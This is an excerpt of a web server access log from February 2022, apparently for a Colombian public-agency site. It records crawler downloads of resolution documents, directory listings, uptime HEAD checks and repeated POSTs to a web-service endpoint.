40.77.167.10 - - [14/Feb/2022:03:30:08 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/autos+2015 HTTP/1.1" 200 102019
201.245.192.253 - - [14/Feb/2022:03:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44227
201.245.192.253 - - [14/Feb/2022:03:31:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121085
34.147.32.4 - - [14/Feb/2022:03:32:34 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/Feb/2022:03:32:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:03:32:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47698
114.119.141.51 - - [14/Feb/2022:03:34:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2992.pdf HTTP/1.1" 200 3174926
114.119.141.69 - - [14/Feb/2022:03:36:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0908.pdf HTTP/1.1" 200 6679986
40.77.167.10 - - [14/Feb/2022:03:36:29 -0500] "GET /bla/resoluciones/notificaciones/autos%202013/2639.doc HTTP/1.1" 200 227328
216.245.221.92 - - [14/Feb/2022:03:37:44 -0500] "HEAD / HTTP/1.1" 200 -
114.119.141.71 - - [14/Feb/2022:03:38:11 -0500] "GET /BLA/resoluciones/AUTOS%202015/0900.pdf HTTP/1.1" 200 162122
207.46.13.99 - - [14/Feb/2022:03:38:26 -0500] "GET /bla/resoluciones/index.php?dir=notificaciones/autos+2020 HTTP/1.1" 200 111599
201.245.192.253 - - [14/Feb/2022:03:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44227
201.245.192.253 - - [14/Feb/2022:03:41:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121085
216.245.221.92 - - [14/Feb/2022:03:42:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:03:42:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47698
199.16.157.181 - - [14/Feb/2022:03:44:04 -0500] "GET /images/desayuno-por-el-clima-del-c40-cop26-3-nov.jpg HTTP/1.1" 200 103146
191.89.18.106 - - [14/Feb/2022:03:46:18 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
40.77.167.52 - - [14/Feb/2022:03:47:01 -0500] "GET /portaldeninos/2021/05/16/ninos-ninas-y-jovenes-podran-participar-con-dibujos-y-pinturas-en-el-concurso-a-vuelo-de-pajaro/ HTTP/1.1" 200 97388
40.77.167.10 - - [14/Feb/2022:03:47:20 -0500] "GET /portaldeninos/wp-includes/js/comment-reply.min.js?ver=4.9.8 HTTP/1.1" 200 1078
216.245.221.92 - - [14/Feb/2022:03:47:44 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [14/Feb/2022:03:52:44 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/Feb/2022:03:52:22 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 121085
